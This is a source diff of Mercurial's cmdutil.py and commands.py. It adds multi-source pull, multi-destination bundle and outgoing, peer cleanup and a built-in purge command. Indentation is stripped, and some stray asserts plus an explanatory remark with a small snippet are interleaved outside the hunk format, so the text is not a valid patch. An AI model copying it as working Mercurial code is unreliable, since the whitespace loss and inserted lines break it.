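    assert branchinfo({b'branch': b'stable', b'close': b'1'}) == (b'stable', True)
    assert branchinfo({}) == (b'default', False)
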
--- a/mercurial/cmdutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cmdutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# cmdutil.py - help for command processing in mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -16,6 +16,7 @@
from .node import (
hex,
nullid,
+ nullrev,
short,
)
from .pycompat import (
@@ -1936,12 +1937,12 @@
ui.debug(b'message:\n%s\n' % (message or b''))
if len(parents) == 1:
- parents.append(repo[nullid])
+ parents.append(repo[nullrev])
if opts.get(b'exact'):
if not nodeid or not p1:
raise error.InputError(_(b'not a Mercurial patch'))
p1 = repo[p1]
- p2 = repo[p2 or nullid]
+ p2 = repo[p2 or nullrev]
elif p2:
try:
p1 = repo[p1]
@@ -1951,10 +1952,10 @@
# first parent.
if p1 != parents[0]:
p1 = parents[0]
- p2 = repo[nullid]
+ p2 = repo[nullrev]
except error.RepoError:
p1, p2 = parents
- if p2.node() == nullid:
+ if p2.rev() == nullrev:
ui.warn(
_(
b"warning: import the patch as a normal revision\n"
@@ -2967,20 +2968,6 @@
# Reroute the working copy parent to the new changeset
repo.setparents(newid, nullid)
- mapping = {old.node(): (newid,)}
- obsmetadata = None
- if opts.get(b'note'):
- obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])}
- backup = ui.configbool(b'rewrite', b'backup-bundle')
- scmutil.cleanupnodes(
- repo,
- mapping,
- b'amend',
- metadata=obsmetadata,
- fixphase=True,
- targetphase=commitphase,
- backup=backup,
- )
# Fixing the dirstate because localrepo.commitctx does not update
# it. This is rather convenient because we did not need to update
@@ -3003,6 +2990,21 @@
for f in removedfiles:
dirstate.drop(f)
+ mapping = {old.node(): (newid,)}
+ obsmetadata = None
+ if opts.get(b'note'):
+ obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])}
+ backup = ui.configbool(b'rewrite', b'backup-bundle')
+ scmutil.cleanupnodes(
+ repo,
+ mapping,
+ b'amend',
+ metadata=obsmetadata,
+ fixphase=True,
+ targetphase=commitphase,
+ backup=backup,
+ )
+
return newid
@@ -3774,7 +3776,7 @@
raise error.StateError(state.msg(), hint=state.hint())
for s in statemod._unfinishedstates:
- if s._opname == b'merge' or state._reportonly:
+ if s._opname == b'merge' or s._reportonly:
continue
if s._clearable and s.isunfinished(repo):
util.unlink(repo.vfs.join(s._fname))
--- a/mercurial/commands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/commands.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# commands.py - command processing for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -74,8 +74,15 @@
from .utils import (
dateutil,
stringutil,
+ urlutil,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ List,
+ )
+
+
table = {}
table.update(debugcommandsmod.command._table)
@@ -1107,9 +1114,8 @@
transition = b"bad"
state[transition].append(node)
ctx = repo[node]
- ui.status(
- _(b'changeset %d:%s: %s\n') % (ctx.rev(), ctx, transition)
- )
+ summary = cmdutil.format_changeset_summary(ui, ctx, b'bisect')
+ ui.status(_(b'changeset %s: %s\n') % (summary, transition))
hbisect.checkstate(state)
# bisect
nodes, changesets, bgood = hbisect.bisect(repo, state)
@@ -1125,15 +1131,15 @@
nodes, changesets, good = hbisect.bisect(repo, state)
if extend:
if not changesets:
- extendnode = hbisect.extendrange(repo, state, nodes, good)
- if extendnode is not None:
+ extendctx = hbisect.extendrange(repo, state, nodes, good)
+ if extendctx is not None:
ui.write(
- _(b"Extending search to changeset %d:%s\n")
- % (extendnode.rev(), extendnode)
+ _(b"Extending search to changeset %s\n")
+ % cmdutil.format_changeset_summary(ui, extendctx, b'bisect')
)
- state[b'current'] = [extendnode.node()]
+ state[b'current'] = [extendctx.node()]
hbisect.save_state(repo, state)
- return mayupdate(repo, extendnode.node())
+ return mayupdate(repo, extendctx.node())
raise error.StateError(_(b"nothing to extend"))
if changesets == 0:
@@ -1146,12 +1152,13 @@
while size <= changesets:
tests, size = tests + 1, size * 2
rev = repo.changelog.rev(node)
+ summary = cmdutil.format_changeset_summary(ui, repo[rev], b'bisect')
ui.write(
_(
- b"Testing changeset %d:%s "
+ b"Testing changeset %s "
b"(%d changesets remaining, ~%d tests)\n"
)
- % (rev, short(node), changesets, tests)
+ % (summary, changesets, tests)
)
state[b'current'] = [node]
hbisect.save_state(repo, state)
@@ -1524,10 +1531,10 @@
),
]
+ remoteopts,
- _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]'),
+ _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]...'),
helpcategory=command.CATEGORY_IMPORT_EXPORT,
)
-def bundle(ui, repo, fname, dest=None, **opts):
+def bundle(ui, repo, fname, *dests, **opts):
"""create a bundle file
Generate a bundle file containing data to be transferred to another
@@ -1538,7 +1545,7 @@
all the nodes you specify with --base parameters. Otherwise, hg
will assume the repository has all the nodes in destination, or
default-push/default if no destination is specified, where destination
- is the repository you provide through DEST option.
+ is any of the repositories you provide through the DEST arguments.
You can change bundle format with the -t/--type option. See
:hg:`help bundlespec` for documentation on this format. By default,
@@ -1583,9 +1590,9 @@
)
if opts.get(b'all'):
- if dest:
+ if dests:
raise error.InputError(
- _(b"--all is incompatible with specifying a destination")
+ _(b"--all is incompatible with specifying destinations")
)
if opts.get(b'base'):
ui.warn(_(b"ignoring --base because --all was specified\n"))
@@ -1598,31 +1605,54 @@
)
if base:
- if dest:
+ if dests:
raise error.InputError(
- _(b"--base is incompatible with specifying a destination")
+ _(b"--base is incompatible with specifying destinations")
)
common = [repo[rev].node() for rev in base]
heads = [repo[r].node() for r in revs] if revs else None
outgoing = discovery.outgoing(repo, common, heads)
+ missing = outgoing.missing
+ excluded = outgoing.excluded
else:
- dest = ui.expandpath(dest or b'default-push', dest or b'default')
- dest, branches = hg.parseurl(dest, opts.get(b'branch'))
- other = hg.peer(repo, opts, dest)
- revs = [repo[r].hex() for r in revs]
- revs, checkout = hg.addbranchrevs(repo, repo, branches, revs)
- heads = revs and pycompat.maplist(repo.lookup, revs) or revs
- outgoing = discovery.findcommonoutgoing(
- repo,
- other,
- onlyheads=heads,
- force=opts.get(b'force'),
- portable=True,
+ missing = set()
+ excluded = set()
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ other = hg.peer(repo, opts, path.rawloc)
+ if revs is not None:
+ hex_revs = [repo[r].hex() for r in revs]
+ else:
+ hex_revs = None
+ branches = (path.branch, [])
+ head_revs, checkout = hg.addbranchrevs(
+ repo, repo, branches, hex_revs
+ )
+ heads = (
+ head_revs
+ and pycompat.maplist(repo.lookup, head_revs)
+ or head_revs
+ )
+ outgoing = discovery.findcommonoutgoing(
+ repo,
+ other,
+ onlyheads=heads,
+ force=opts.get(b'force'),
+ portable=True,
+ )
+ missing.update(outgoing.missing)
+ excluded.update(outgoing.excluded)
+
+ if not missing:
+ scmutil.nochangesfound(ui, repo, not base and excluded)
+ return 1
+
+ if heads:
+ outgoing = discovery.outgoing(
+ repo, missingroots=missing, ancestorsof=heads
)
-
- if not outgoing.missing:
- scmutil.nochangesfound(ui, repo, not base and outgoing.excluded)
- return 1
+ else:
+ outgoing = discovery.outgoing(repo, missingroots=missing)
+ outgoing.excluded = sorted(excluded)
if cgversion == b'01': # bundle1
bversion = b'HG10' + bundlespec.wirecompression
@@ -1648,6 +1678,14 @@
if complevel is not None:
compopts[b'level'] = complevel
+ compthreads = ui.configint(
+ b'experimental', b'bundlecompthreads.' + bundlespec.compression
+ )
+ if compthreads is None:
+ compthreads = ui.configint(b'experimental', b'bundlecompthreads')
+ if compthreads is not None:
+ compopts[b'threads'] = compthreads
+
# Bundling of obsmarker and phases is optional as not all clients
# support the necessary features.
cfg = ui.configbool
@@ -2399,7 +2437,8 @@
To undo marking a destination file as copied, use --forget. With that
option, all given (positional) arguments are unmarked as copies. The
- destination file(s) will be left in place (still tracked).
+ destination file(s) will be left in place (still tracked). Note that
+ :hg:`copy --forget` behaves the same way as :hg:`rename --forget`.
This command takes effect with the next commit by default.
@@ -2550,7 +2589,7 @@
if change:
repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn')
ctx2 = scmutil.revsingle(repo, change, None)
- ctx1 = ctx2.p1()
+ ctx1 = logcmdutil.diff_parent(ctx2)
elif from_rev or to_rev:
repo = scmutil.unhidehashlikerevs(
repo, [from_rev] + [to_rev], b'nowarn'
@@ -3287,7 +3326,8 @@
)
# checking that newnodes exist because old state files won't have it
elif statedata.get(b'newnodes') is not None:
- statedata[b'newnodes'].append(node)
+ nn = statedata[b'newnodes'] # type: List[bytes]
+ nn.append(node)
# remove state when we complete successfully
if not opts.get(b'dry_run'):
@@ -3821,132 +3861,140 @@
output = []
revs = []
- if source:
- source, branches = hg.parseurl(ui.expandpath(source))
- peer = hg.peer(repo or ui, opts, source) # only pass ui when no repo
- repo = peer.local()
- revs, checkout = hg.addbranchrevs(repo, peer, branches, None)
-
- fm = ui.formatter(b'identify', opts)
- fm.startitem()
-
- if not repo:
- if num or branch or tags:
- raise error.InputError(
- _(b"can't query remote revision number, branch, or tags")
+ peer = None
+ try:
+ if source:
+ source, branches = urlutil.get_unique_pull_path(
+ b'identify', repo, ui, source
)
- if not rev and revs:
- rev = revs[0]
- if not rev:
- rev = b"tip"
-
- remoterev = peer.lookup(rev)
- hexrev = fm.hexfunc(remoterev)
- if default or id:
- output = [hexrev]
- fm.data(id=hexrev)
-
- @util.cachefunc
- def getbms():
- bms = []
-
- if b'bookmarks' in peer.listkeys(b'namespaces'):
- hexremoterev = hex(remoterev)
- bms = [
- bm
- for bm, bmr in pycompat.iteritems(
- peer.listkeys(b'bookmarks')
+ # only pass ui when no repo
+ peer = hg.peer(repo or ui, opts, source)
+ repo = peer.local()
+ revs, checkout = hg.addbranchrevs(repo, peer, branches, None)
+
+ fm = ui.formatter(b'identify', opts)
+ fm.startitem()
+
+ if not repo:
+ if num or branch or tags:
+ raise error.InputError(
+ _(b"can't query remote revision number, branch, or tags")
+ )
+ if not rev and revs:
+ rev = revs[0]
+ if not rev:
+ rev = b"tip"
+
+ remoterev = peer.lookup(rev)
+ hexrev = fm.hexfunc(remoterev)
+ if default or id:
+ output = [hexrev]
+ fm.data(id=hexrev)
+
+ @util.cachefunc
+ def getbms():
+ bms = []
+
+ if b'bookmarks' in peer.listkeys(b'namespaces'):
+ hexremoterev = hex(remoterev)
+ bms = [
+ bm
+ for bm, bmr in pycompat.iteritems(
+ peer.listkeys(b'bookmarks')
+ )
+ if bmr == hexremoterev
+ ]
+
+ return sorted(bms)
+
+ if fm.isplain():
+ if bookmarks:
+ output.extend(getbms())
+ elif default and not ui.quiet:
+ # multiple bookmarks for a single parent separated by '/'
+ bm = b'/'.join(getbms())
+ if bm:
+ output.append(bm)
+ else:
+ fm.data(node=hex(remoterev))
+ if bookmarks or b'bookmarks' in fm.datahint():
+ fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark'))
+ else:
+ if rev:
+ repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn')
+ ctx = scmutil.revsingle(repo, rev, None)
+
+ if ctx.rev() is None:
+ ctx = repo[None]
+ parents = ctx.parents()
+ taglist = []
+ for p in parents:
+ taglist.extend(p.tags())
+
+ dirty = b""
+ if ctx.dirty(missing=True, merge=False, branch=False):
+ dirty = b'+'
+ fm.data(dirty=dirty)
+
+ hexoutput = [fm.hexfunc(p.node()) for p in parents]
+ if default or id:
+ output = [b"%s%s" % (b'+'.join(hexoutput), dirty)]
+ fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty))
+
+ if num:
+ numoutput = [b"%d" % p.rev() for p in parents]
+ output.append(b"%s%s" % (b'+'.join(numoutput), dirty))
+
+ fm.data(
+ parents=fm.formatlist(
+ [fm.hexfunc(p.node()) for p in parents], name=b'node'
)
- if bmr == hexremoterev
- ]
-
- return sorted(bms)
-
- if fm.isplain():
- if bookmarks:
- output.extend(getbms())
- elif default and not ui.quiet:
+ )
+ else:
+ hexoutput = fm.hexfunc(ctx.node())
+ if default or id:
+ output = [hexoutput]
+ fm.data(id=hexoutput)
+
+ if num:
+ output.append(pycompat.bytestr(ctx.rev()))
+ taglist = ctx.tags()
+
+ if default and not ui.quiet:
+ b = ctx.branch()
+ if b != b'default':
+ output.append(b"(%s)" % b)
+
+ # multiple tags for a single parent separated by '/'
+ t = b'/'.join(taglist)
+ if t:
+ output.append(t)
+
# multiple bookmarks for a single parent separated by '/'
- bm = b'/'.join(getbms())
+ bm = b'/'.join(ctx.bookmarks())
if bm:
output.append(bm)
- else:
- fm.data(node=hex(remoterev))
- if bookmarks or b'bookmarks' in fm.datahint():
- fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark'))
- else:
- if rev:
- repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn')
- ctx = scmutil.revsingle(repo, rev, None)
-
- if ctx.rev() is None:
- ctx = repo[None]
- parents = ctx.parents()
- taglist = []
- for p in parents:
- taglist.extend(p.tags())
-
- dirty = b""
- if ctx.dirty(missing=True, merge=False, branch=False):
- dirty = b'+'
- fm.data(dirty=dirty)
-
- hexoutput = [fm.hexfunc(p.node()) for p in parents]
- if default or id:
- output = [b"%s%s" % (b'+'.join(hexoutput), dirty)]
- fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty))
-
- if num:
- numoutput = [b"%d" % p.rev() for p in parents]
- output.append(b"%s%s" % (b'+'.join(numoutput), dirty))
-
- fm.data(
- parents=fm.formatlist(
- [fm.hexfunc(p.node()) for p in parents], name=b'node'
- )
- )
- else:
- hexoutput = fm.hexfunc(ctx.node())
- if default or id:
- output = [hexoutput]
- fm.data(id=hexoutput)
-
- if num:
- output.append(pycompat.bytestr(ctx.rev()))
- taglist = ctx.tags()
-
- if default and not ui.quiet:
- b = ctx.branch()
- if b != b'default':
- output.append(b"(%s)" % b)
-
- # multiple tags for a single parent separated by '/'
- t = b'/'.join(taglist)
- if t:
- output.append(t)
-
- # multiple bookmarks for a single parent separated by '/'
- bm = b'/'.join(ctx.bookmarks())
- if bm:
- output.append(bm)
- else:
- if branch:
- output.append(ctx.branch())
-
- if tags:
- output.extend(taglist)
-
- if bookmarks:
- output.extend(ctx.bookmarks())
-
- fm.data(node=ctx.hex())
- fm.data(branch=ctx.branch())
- fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':'))
- fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark'))
- fm.context(ctx=ctx)
-
- fm.plain(b"%s\n" % b' '.join(output))
- fm.end()
+ else:
+ if branch:
+ output.append(ctx.branch())
+
+ if tags:
+ output.extend(taglist)
+
+ if bookmarks:
+ output.extend(ctx.bookmarks())
+
+ fm.data(node=ctx.hex())
+ fm.data(branch=ctx.branch())
+ fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':'))
+ fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark'))
+ fm.context(ctx=ctx)
+
+ fm.plain(b"%s\n" % b' '.join(output))
+ fm.end()
+ finally:
+ if peer:
+ peer.close()
@command(
@@ -4288,22 +4336,22 @@
cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle'])
if opts.get(b'bookmarks'):
- source, branches = hg.parseurl(
- ui.expandpath(source), opts.get(b'branch')
- )
- other = hg.peer(repo, opts, source)
- if b'bookmarks' not in other.listkeys(b'namespaces'):
- ui.warn(_(b"remote doesn't support bookmarks\n"))
- return 0
- ui.pager(b'incoming')
- ui.status(_(b'comparing with %s\n') % util.hidepassword(source))
- return bookmarks.incoming(ui, repo, other)
-
- repo._subtoppath = ui.expandpath(source)
- try:
- return hg.incoming(ui, repo, source, opts)
- finally:
- del repo._subtoppath
+ srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch'))
+ for source, branches in srcs:
+ other = hg.peer(repo, opts, source)
+ try:
+ if b'bookmarks' not in other.listkeys(b'namespaces'):
+ ui.warn(_(b"remote doesn't support bookmarks\n"))
+ return 0
+ ui.pager(b'incoming')
+ ui.status(
+ _(b'comparing with %s\n') % urlutil.hidepassword(source)
+ )
+ return bookmarks.incoming(ui, repo, other)
+ finally:
+ other.close()
+
+ return hg.incoming(ui, repo, source, opts)
@command(
@@ -4328,7 +4376,9 @@
Returns 0 on success.
"""
opts = pycompat.byteskwargs(opts)
- hg.peer(ui, opts, ui.expandpath(dest), create=True)
+ path = urlutil.get_clone_path(ui, dest)[1]
+ peer = hg.peer(ui, opts, path, create=True)
+ peer.close()
@command(
@@ -4896,10 +4946,10 @@
+ logopts
+ remoteopts
+ subrepoopts,
- _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]'),
+ _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]...'),
helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT,
)
-def outgoing(ui, repo, dest=None, **opts):
+def outgoing(ui, repo, *dests, **opts):
"""show changesets not found in the destination
Show changesets not found in the specified destination repository
@@ -4935,47 +4985,24 @@
Returns 0 if there are outgoing changes, 1 otherwise.
"""
- # hg._outgoing() needs to re-resolve the path in order to handle #branch
- # style URLs, so don't overwrite dest.
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.ConfigError(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
-
opts = pycompat.byteskwargs(opts)
- if opts.get(b'graph'):
- logcmdutil.checkunsupportedgraphflags([], opts)
- o, other = hg._outgoing(ui, repo, dest, opts)
- if not o:
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- return
-
- revdag = logcmdutil.graphrevs(repo, o, opts)
- ui.pager(b'outgoing')
- displayer = logcmdutil.changesetdisplayer(ui, repo, opts, buffered=True)
- logcmdutil.displaygraph(
- ui, repo, revdag, displayer, graphmod.asciiedges
- )
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- return 0
-
if opts.get(b'bookmarks'):
- dest = path.pushloc or path.loc
- other = hg.peer(repo, opts, dest)
- if b'bookmarks' not in other.listkeys(b'namespaces'):
- ui.warn(_(b"remote doesn't support bookmarks\n"))
- return 0
- ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
- ui.pager(b'outgoing')
- return bookmarks.outgoing(ui, repo, other)
-
- repo._subtoppath = path.pushloc or path.loc
- try:
- return hg.outgoing(ui, repo, dest, opts)
- finally:
- del repo._subtoppath
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ dest = path.pushloc or path.loc
+ other = hg.peer(repo, opts, dest)
+ try:
+ if b'bookmarks' not in other.listkeys(b'namespaces'):
+ ui.warn(_(b"remote doesn't support bookmarks\n"))
+ return 0
+ ui.status(
+ _(b'comparing with %s\n') % urlutil.hidepassword(dest)
+ )
+ ui.pager(b'outgoing')
+ return bookmarks.outgoing(ui, repo, other)
+ finally:
+ other.close()
+
+ return hg.outgoing(ui, repo, dests, opts)
@command(
@@ -5113,7 +5140,7 @@
fm = ui.formatter(b'paths', opts)
if fm.isplain():
- hidepassword = util.hidepassword
+ hidepassword = urlutil.hidepassword
else:
hidepassword = bytes
if ui.quiet:
@@ -5244,9 +5271,11 @@
:optupdate: updating working directory is needed or not
:checkout: update destination revision (or None to default destination)
:brev: a name, which might be a bookmark to be activated after updating
+
+ return True if the update raised any conflict, False otherwise.
"""
if modheads == 0:
- return
+ return False
if optupdate:
try:
return hg.updatetotally(ui, repo, checkout, brev)
@@ -5268,6 +5297,7 @@
ui.status(_(b"(run 'hg heads' to see heads)\n"))
elif not ui.configbool(b'commands', b'update.requiredest'):
ui.status(_(b"(run 'hg update' to get a working copy)\n"))
+ return False
@command(
@@ -5308,11 +5338,11 @@
),
]
+ remoteopts,
- _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]'),
+ _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]...'),
helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT,
helpbasic=True,
)
-def pull(ui, repo, source=b"default", **opts):
+def pull(ui, repo, *sources, **opts):
"""pull changes from the specified source
Pull changes from a remote repository to a local one.
@@ -5336,6 +5366,10 @@
If SOURCE is omitted, the 'default' path will be used.
See :hg:`help urls` for more information.
+ If multiple sources are specified, they will be pulled sequentially as if
+ the command was run multiple times. If --update is specified, the command
+ will stop at the first failed --update.
+
Specifying bookmark as ``.`` is equivalent to specifying the active
bookmark's name.
@@ -5350,101 +5384,211 @@
hint = _(b'use hg pull followed by hg update DEST')
raise error.InputError(msg, hint=hint)
- source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch'))
- ui.status(_(b'pulling from %s\n') % util.hidepassword(source))
- ui.flush()
- other = hg.peer(repo, opts, source)
- try:
- revs, checkout = hg.addbranchrevs(
- repo, other, branches, opts.get(b'rev')
- )
-
- pullopargs = {}
-
- nodes = None
- if opts.get(b'bookmark') or revs:
- # The list of bookmark used here is the same used to actually update
- # the bookmark names, to avoid the race from issue 4689 and we do
- # all lookup and bookmark queries in one go so they see the same
- # version of the server state (issue 4700).
- nodes = []
- fnodes = []
- revs = revs or []
- if revs and not other.capable(b'lookup'):
- err = _(
- b"other repository doesn't support revision lookup, "
- b"so a rev cannot be specified."
- )
- raise error.Abort(err)
- with other.commandexecutor() as e:
- fremotebookmarks = e.callcommand(
- b'listkeys', {b'namespace': b'bookmarks'}
- )
- for r in revs:
- fnodes.append(e.callcommand(b'lookup', {b'key': r}))
- remotebookmarks = fremotebookmarks.result()
- remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks)
- pullopargs[b'remotebookmarks'] = remotebookmarks
- for b in opts.get(b'bookmark', []):
- b = repo._bookmarks.expandname(b)
- if b not in remotebookmarks:
- raise error.InputError(
- _(b'remote bookmark %s not found!') % b
+ sources = urlutil.get_pull_paths(repo, ui, sources, opts.get(b'branch'))
+ for source, branches in sources:
+ ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source))
+ ui.flush()
+ other = hg.peer(repo, opts, source)
+ update_conflict = None
+ try:
+ revs, checkout = hg.addbranchrevs(
+ repo, other, branches, opts.get(b'rev')
+ )
+
+ pullopargs = {}
+
+ nodes = None
+ if opts.get(b'bookmark') or revs:
+ # The list of bookmark used here is the same used to actually update
+ # the bookmark names, to avoid the race from issue 4689 and we do
+ # all lookup and bookmark queries in one go so they see the same
+ # version of the server state (issue 4700).
+ nodes = []
+ fnodes = []
+ revs = revs or []
+ if revs and not other.capable(b'lookup'):
+ err = _(
+ b"other repository doesn't support revision lookup, "
+ b"so a rev cannot be specified."
+ )
+ raise error.Abort(err)
+ with other.commandexecutor() as e:
+ fremotebookmarks = e.callcommand(
+ b'listkeys', {b'namespace': b'bookmarks'}
+ )
+ for r in revs:
+ fnodes.append(e.callcommand(b'lookup', {b'key': r}))
+ remotebookmarks = fremotebookmarks.result()
+ remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks)
+ pullopargs[b'remotebookmarks'] = remotebookmarks
+ for b in opts.get(b'bookmark', []):
+ b = repo._bookmarks.expandname(b)
+ if b not in remotebookmarks:
+ raise error.InputError(
+ _(b'remote bookmark %s not found!') % b
+ )
+ nodes.append(remotebookmarks[b])
+ for i, rev in enumerate(revs):
+ node = fnodes[i].result()
+ nodes.append(node)
+ if rev == checkout:
+ checkout = node
+
+ wlock = util.nullcontextmanager()
+ if opts.get(b'update'):
+ wlock = repo.wlock()
+ with wlock:
+ pullopargs.update(opts.get(b'opargs', {}))
+ modheads = exchange.pull(
+ repo,
+ other,
+ heads=nodes,
+ force=opts.get(b'force'),
+ bookmarks=opts.get(b'bookmark', ()),
+ opargs=pullopargs,
+ confirm=opts.get(b'confirm'),
+ ).cgresult
+
+ # brev is a name, which might be a bookmark to be activated at
+ # the end of the update. In other words, it is an explicit
+ # destination of the update
+ brev = None
+
+ if checkout:
+ checkout = repo.unfiltered().changelog.rev(checkout)
+
+ # order below depends on implementation of
+ # hg.addbranchrevs(). opts['bookmark'] is ignored,
+ # because 'checkout' is determined without it.
+ if opts.get(b'rev'):
+ brev = opts[b'rev'][0]
+ elif opts.get(b'branch'):
+ brev = opts[b'branch'][0]
+ else:
+ brev = branches[0]
+ repo._subtoppath = source
+ try:
+ update_conflict = postincoming(
+ ui, repo, modheads, opts.get(b'update'), checkout, brev
)
- nodes.append(remotebookmarks[b])
- for i, rev in enumerate(revs):
- node = fnodes[i].result()
- nodes.append(node)
- if rev == checkout:
- checkout = node
-
- wlock = util.nullcontextmanager()
- if opts.get(b'update'):
- wlock = repo.wlock()
- with wlock:
- pullopargs.update(opts.get(b'opargs', {}))
- modheads = exchange.pull(
- repo,
- other,
- heads=nodes,
- force=opts.get(b'force'),
- bookmarks=opts.get(b'bookmark', ()),
- opargs=pullopargs,
- confirm=opts.get(b'confirm'),
- ).cgresult
-
- # brev is a name, which might be a bookmark to be activated at
- # the end of the update. In other words, it is an explicit
- # destination of the update
- brev = None
-
- if checkout:
- checkout = repo.unfiltered().changelog.rev(checkout)
-
- # order below depends on implementation of
- # hg.addbranchrevs(). opts['bookmark'] is ignored,
- # because 'checkout' is determined without it.
- if opts.get(b'rev'):
- brev = opts[b'rev'][0]
- elif opts.get(b'branch'):
- brev = opts[b'branch'][0]
- else:
- brev = branches[0]
- repo._subtoppath = source
- try:
- ret = postincoming(
- ui, repo, modheads, opts.get(b'update'), checkout, brev
- )
- except error.FilteredRepoLookupError as exc:
- msg = _(b'cannot update to target: %s') % exc.args[0]
- exc.args = (msg,) + exc.args[1:]
- raise
- finally:
- del repo._subtoppath
-
- finally:
- other.close()
- return ret
+ except error.FilteredRepoLookupError as exc:
+ msg = _(b'cannot update to target: %s') % exc.args[0]
+ exc.args = (msg,) + exc.args[1:]
+ raise
+ finally:
+ del repo._subtoppath
+
+ finally:
+ other.close()
+ # skip the remaining pull sources if there is some conflict.
+ if update_conflict:
+ break
+ if update_conflict:
+ return 1
+ else:
+ return 0
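Multi-source pull therefore behaves like running the command once per source, stopping early only on an update conflict. The control flow in isolation (pull_one is a hypothetical callable returning whether the post-pull update conflicted):

    def pull_all(sources, pull_one):
        for source in sources:
            if pull_one(source):
                # skip the remaining sources, mirroring the break above
                return 1
        return 0

    # the second source conflicts, so the third is never pulled
    results = iter([False, True, False])
    assert pull_all(['a', 'b', 'c'], lambda s: next(results)) == 1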
+
+
+@command(
+ b'purge|clean',
+ [
+ (b'a', b'abort-on-err', None, _(b'abort if an error occurs')),
+ (b'', b'all', None, _(b'purge ignored files too')),
+ (b'i', b'ignored', None, _(b'purge only ignored files')),
+ (b'', b'dirs', None, _(b'purge empty directories')),
+ (b'', b'files', None, _(b'purge files')),
+ (b'p', b'print', None, _(b'print filenames instead of deleting them')),
+ (
+ b'0',
+ b'print0',
+ None,
+ _(
+ b'end filenames with NUL, for use with xargs'
+ b' (implies -p/--print)'
+ ),
+ ),
+ (b'', b'confirm', None, _(b'ask before permanently deleting files')),
+ ]
+ + cmdutil.walkopts,
+ _(b'hg purge [OPTION]... [DIR]...'),
+ helpcategory=command.CATEGORY_WORKING_DIRECTORY,
+)
+def purge(ui, repo, *dirs, **opts):
+ """removes files not tracked by Mercurial
+
+ Delete files not known to Mercurial. This is useful to test local
+ and uncommitted changes in an otherwise-clean source tree.
+
+ This means that purge will delete the following by default:
+
+ - Unknown files: files marked with "?" by :hg:`status`
+ - Empty directories: in fact Mercurial ignores directories unless
+ they contain files under source control management
+
+ But it will leave untouched:
+
+ - Modified and unmodified tracked files
+ - Ignored files (unless -i or --all is specified)
+ - New files added to the repository (with :hg:`add`)
+
+ The --files and --dirs options can be used to direct purge to delete
+ only files, only directories, or both. If neither option is given,
+ both will be deleted.
+
+ If directories are given on the command line, only files in these
+ directories are considered.
+
+ Be careful with purge, as you could irreversibly delete some files
+ you forgot to add to the repository. If you only want to print the
+ list of files that this program would delete, use the --print
+ option.
+ """
+ opts = pycompat.byteskwargs(opts)
+ cmdutil.check_at_most_one_arg(opts, b'all', b'ignored')
+
+ act = not opts.get(b'print')
+ eol = b'\n'
+ if opts.get(b'print0'):
+ eol = b'\0'
+ act = False # --print0 implies --print
+ if opts.get(b'all', False):
+ ignored = True
+ unknown = True
+ else:
+ ignored = opts.get(b'ignored', False)
+ unknown = not ignored
+
+ removefiles = opts.get(b'files')
+ removedirs = opts.get(b'dirs')
+ confirm = opts.get(b'confirm')
+ if confirm is None:
+ try:
+ extensions.find(b'purge')
+ confirm = False
+ except KeyError:
+ confirm = True
+
+ if not removefiles and not removedirs:
+ removefiles = True
+ removedirs = True
+
+ match = scmutil.match(repo[None], dirs, opts)
+
+ paths = mergemod.purge(
+ repo,
+ match,
+ unknown=unknown,
+ ignored=ignored,
+ removeemptydirs=removedirs,
+ removefiles=removefiles,
+ abortonerror=opts.get(b'abort_on_err'),
+ noop=not act,
+ confirm=confirm,
+ )
+
+ for path in paths:
+ if not act:
+ ui.write(b'%s%s' % (path, eol))
@command(
@@ -5482,11 +5626,11 @@
),
]
+ remoteopts,
- _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]'),
+ _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]...'),
helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT,
helpbasic=True,
)
